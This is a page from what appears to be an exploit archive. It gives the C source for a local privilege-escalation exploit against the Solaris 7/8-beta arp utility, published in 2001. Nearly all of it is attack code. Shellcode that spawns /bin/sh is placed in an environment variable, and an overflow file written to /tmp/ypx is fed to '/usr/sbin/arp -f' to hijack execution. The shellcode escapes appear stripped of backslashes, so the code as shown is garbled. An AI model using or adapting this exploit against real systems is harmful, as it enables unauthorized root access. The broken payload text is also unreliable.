[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Solaris 7 / 8-beta arp Local Overflow Exploit
# Published : 2001-01-15
# Author : ahmed
# Previous Title : Redhat 6.1 man Local Exploit (egid 15)
# Next Title : glibc-2.2 and openssh-2.3.0p1 exploits glibc >= 2.1.9x
/*
arp overflow proof of concept by ahmed@securityfocus.com
shellcode originally written by Cheez Whiz.
tested on x86 solaris 7,8beta
default should work. if not, arg1 = offset. +- by 100's
Copyright Security-Focus.com, 11/2000
*/
long get_esp() { __asm__("movl %esp,%eax"); }
int main(int ac, char **av)
{
char shell[] =
"xebx45x9axffxffxffxffx07xff"
"xc3x5ex31xc0x89x46xb7x88x46"
"xbcx88x46x07x89x46x0cx31xc0"
"xb0x2fxe8xe0xffxffxffx52x52"
"x31xc0xb0xcbxe8xd5xffxffxff"
"x83xc4x08x31xc0x50x8dx5ex08"
"x53x8dx1ex89x5ex08x53xb0x3b"
"xe8xbexffxffxffx83xc4x0cxe8"
"xbexffxffxffx2fx62x69x6ex2f"
"x73x68xffxffxffxffxffxffxff"
"xffxff";
unsigned long magic = 0x8047b78;
unsigned long r = get_esp() + 600;
unsigned char buf[300];
int f;
if (ac == 2)
r += atoi(av[1]);
memset(buf,0x61,sizeof(buf));
memcpy(buf+52,&magic,4);
memcpy(buf+76,&r,4);
f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600);
write(f,"1 2 3 4 ",8);
write(f,buf,sizeof(buf));
close(f);
memset(buf,0x90,sizeof(buf));
memcpy(buf,"LOL=",4);
memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
putenv(buf);
system("/usr/sbin/arp -f /tmp/ypx");
unlink("/tmp/ypx");
}
// www.Syue.com [2001-01-15]